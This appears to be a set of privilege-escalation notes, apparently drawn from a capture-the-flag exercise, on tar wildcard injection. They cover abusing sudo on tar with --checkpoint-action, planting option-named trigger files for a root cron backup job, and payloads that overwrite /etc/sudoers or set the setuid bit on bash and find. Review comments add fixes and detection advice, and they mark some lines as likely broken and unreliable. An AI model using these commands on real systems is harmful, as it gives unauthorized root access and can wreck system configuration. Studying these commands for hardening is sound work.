# Only works because a sudoers rule lets this user run tar as root. tar's
# --checkpoint-action=exec runs the given command with tar's own (here: root)
# privileges, so such a rule is equivalent to unrestricted root.
# Mitigation: never grant sudo to archivers/interpreters; if a rule is unavoidable,
# pin the exact argument list in sudoers. Detection: tar invocations carrying
# --checkpoint-action in sudo/auditd logs.
sudo tar cf archive.tar * --checkpoint=1 --checkpoint-action=exec=/bin/bash
sudoers file
echo 'echo "wook ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > demo.sh
# Files whose names begin with "--" are created on purpose: when the unquoted "*"
# on the tar line below is expanded by the shell, these names land in tar's argv
# and are parsed as options rather than paths. Nothing here is privileged by
# itself; demo.sh (which overwrites, not appends to, /etc/sudoers) only takes
# effect if the tar invocation runs as root (cron job or sudo).
echo "" > "--checkpoint-action=exec=sh demo.sh"
echo "" > --checkpoint=1
# Safe form for any script or cron job: end option parsing or anchor the glob,
#   tar cf archive.tar -- *     or     tar cf archive.tar ./*
tar cf archive.tar *
# Same trigger-file pattern; this payload sets the setuid bit on find, so later
# find invocations run as the binary's owner (root on a standard install).
# Detection: a setuid-bit change on a stock binary is caught by file-integrity
# monitoring or a periodic setuid inventory.
echo "chmod u+s /usr/bin/find" > test.sh
echo "" > "--checkpoint-action=exec=sh test.sh"
echo "" > --checkpoint=1
# As above: only escalates if this tar runs with root privileges.
tar cf archive.tar *
ls -al /usr/bin/find
# NOTE(review): "\\;" is most likely a markdown-escaped "\;". As written, bash
# passes a lone "\" and the unquoted ";" ends the command, so find would report
# a missing -exec terminator — verify against the original page.
find f1 -exec "whoami" \\;
# (terminal output of the previous command, not a command)
root
find f1 -exec "/bin/sh" \\;
id
whoami
---
# OR more simply
# Variant of the above: the payload sets the setuid bit on the shell itself.
# The privileged tar line that expands "*" is not shown in this snippet; without
# it the trigger files are inert.
echo "chmod +s /bin/bash" > test.sh
echo "" > "--checkpoint-action=exec=sh test.sh"
echo "" > --checkpoint=1
Cron job + Wildcard injection
andre@cmess:~/backup$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/2 * * * * root cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz *
# Context: the system crontab shown above runs, as root every two minutes,
#   cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz *
# The shell expands "*" before tar starts, so any file in this user-writable
# directory whose name begins with "--" reaches tar as an option. Fix the job
# with "tar -zcf /tmp/andre_backup.tar.gz -- *" (or "./*"), or pass tar an
# explicit NUL-delimited file list. Detection: file names beginning with "-" in
# directories consumed by privileged cron jobs; setuid-bit changes on /bin/bash.
cd /home/andre/backup
# Create the malicious file (the script the checkpoint action will run)
echo 'chmod +s /bin/bash' > shell.sh
chmod +x shell.sh
# Create the trigger files
touch "--checkpoint=1"
touch "--checkpoint-action=exec=sh shell.sh"
# If an error occurs while creating the trigger files:
# the name has to be marked as a file name rather than an option ("--" ends
# touch's option parsing; the shell quotes above do not help, because touch
# still receives an argument starting with "--").
touch -- '--checkpoint=1'
touch -- '--checkpoint-action=exec=sh shell.sh'
# or
# NOTE(review): touch parses "--checkpoint=1" as an option here as well, so these
# two lines likely fail with "unrecognized option"; the "--" form above is the
# one that works. "\\ " is probably a markdown-escaped "\ " — verify.
touch /home/andre/backup --checkpoint=1
touch /home/andre/backup --checkpoint-action=exec=sh\\ shell.sh